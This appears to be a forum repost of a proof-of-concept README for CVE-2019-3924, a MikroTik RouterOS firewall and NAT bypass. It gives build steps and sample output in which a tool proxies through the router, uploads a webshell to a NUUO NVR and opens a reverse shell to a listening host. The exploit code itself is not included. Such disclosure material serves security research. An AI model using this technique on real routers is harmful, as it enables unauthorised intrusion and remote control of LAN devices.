Jump to content

MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass


Recommended Posts

  • Group:  team members
  • Content Count:  564
  • Achievement Points:  3,754
  • With Us For:  157 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows

# CVE-2019-3924

A remote, unauthenticated attacker can proxy traffic through RouterOS via probes sent to the agent binary. This PoC demonstrates how to exploit a LAN host from the WAN. A video demonstrating the attack can be found here:

* https://www.youtube.com/watch?v=CxyOtsNVgFg

A Tenable Research Advisory for the vulnerability can be found here:

* https://www.tenable.com/security/research/tra-2019-07

## Compilation
This code was tested on Ubuntu 18.04. There is a dependency on boost, gtest, and cmake. Simply install them like so:

sudo apt install libboost-dev cmake

To compile simply do the following:

cd routeros/poc/cve_2019_3924/
mkdir build
cd build
cmake ..

## Sample Usage

albinolobster@ubuntu:~/routeros/poc/cve_2019_3924/build$ ./nvr_rev_shell --proxy_ip --proxy_port 8291 --target_ip --target_port 80 --listening_ip --listening_port 1270
[!] Running in exploitation mode
[+] Attempting to connect to a MikroTik router at
[+] Connected!
[+] Looking for a NUUO NVR at
[+] Found a NUUO NVR!
[+] Uploading a webshell
[+] Executing a reverse shell to
[+] Done!

Proof of Concept:
Link to comment
Share on other sites

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...